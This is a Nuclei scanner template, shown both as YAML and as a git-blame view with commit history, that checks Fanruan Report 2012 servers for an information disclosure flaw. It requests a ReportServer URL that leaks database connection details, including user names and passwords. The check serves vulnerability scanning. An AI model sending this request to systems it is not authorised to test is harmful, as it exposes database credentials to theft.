nuclei-templates/http/vulnerabilities/other/fanruanoa2012-disclosure.yaml

id: fanruanoa2012-disclosure

info:
  name: Fanruan Report 2012 Information Disclosure
  author: YanYun
  severity: high
  description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
  metadata:
    max-request: 2
  tags: oa,java,fanruan,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
      - "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"connection"'
          - '"name"'
          - '"driver"'
          - '"password"'
          - '"url"'
          - '"user"'
        condition: and

      - type: word
        words:
          - "application/json"
        part: header

# digest: 4b0a00483046022100b900f828bd204277c8567db75729453cfa606cb19b0d483fdf77c550c320ab43022100c7226d84de5f0777b215fe9a2b861232df53f2e4b5cbd730ebfc1680a9d1a820:922c64590222798bb761d5b6d8e72950
Adding Fanruan related templates 2021-05-20 17:26:55 +00:00			`id: fanruanoa2012-disclosure`

			`info:`
			`name: Fanruan Report 2012 Information Disclosure`
			`author: YanYun`
			`severity: high`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL`
			`reference:`
			`- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
templateman update 2023-10-14 11:27:55 +00:00			`tags: oa,java,fanruan,disclosure`
Adding Fanruan related templates 2021-05-20 17:26:55 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Adding Fanruan related templates 2021-05-20 17:26:55 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"`
			`- "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`words:`
More strict matcher 2021-05-20 17:45:01 +00:00			`- '"connection"'`
			`- '"name"'`
			`- '"driver"'`
			`- '"password"'`
			`- '"url"'`
			`- '"user"'`
			`condition: and`

			`- type: word`
			`words:`
			`- "application/json"`
templateman update 2023-10-14 11:27:55 +00:00			`part: header`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100b900f828bd204277c8567db75729453cfa606cb19b0d483fdf77c550c320ab43022100c7226d84de5f0777b215fe9a2b861232df53f2e4b5cbd730ebfc1680a9d1a820:922c64590222798bb761d5b6d8e72950`